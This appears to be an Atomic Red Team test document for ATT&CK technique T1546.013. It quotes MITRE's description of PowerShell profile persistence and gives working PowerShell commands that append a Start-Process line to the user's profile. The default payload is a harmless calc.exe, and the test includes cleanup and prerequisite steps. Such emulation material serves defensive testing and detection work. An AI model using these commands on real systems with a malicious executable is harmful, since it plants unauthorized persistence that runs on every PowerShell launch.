security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c7310aa4276f8d1ac64bd3f23eefbfdd6e2e42ff
atomic-red-team/atomics/T1546.013/T1546.013.md
T
Atomic Red Team doc generator 9f6a1eab36 Generated docs from job=generate-docs branch=master [ci skip]
2026-02-18 16:55:45 +00:00

65 lines
2.9 KiB
Markdown
Raw Blame History

# T1546.013 - Event Triggered Execution: PowerShell Profile
## Description from ATT&CK
> Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.
>
> [PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)
>
> Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the <code>-NoProfile</code> flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)
>
> An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)
[Source](https://attack.mitre.org/techniques/T1546/013)
## Atomic Tests
- [Atomic Test #1: Append malicious start-process cmdlet](#atomic-test-1-append-malicious-start-process-cmdlet)
### Atomic Test #1: Append malicious start-process cmdlet
Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
**auto_generated_guid:** `090e5aa5-32b6-473b-a49b-21e843a56896`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_path | Path the malicious executable | path | calc.exe|
| ps_profile | Powershell profile to use | string | $profile|
#### Attack Commands: Run with `powershell`!
```powershell
Add-Content #{ps_profile} -Value ""
Add-Content #{ps_profile} -Value "Start-Process #{exe_path}"
powershell -Command exit
```
#### Cleanup Commands
```powershell
$oldprofile = cat $profile | Select-Object -skiplast 1
Set-Content $profile -Value $oldprofile
```
#### Dependencies: Run with `powershell`!
##### Description: Ensure a powershell profile exists for the current user
###### Check Prereq Commands
```powershell
if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Path #{ps_profile} -Type File -Force
```
Reference in New Issue View Git Blame Copy Permalink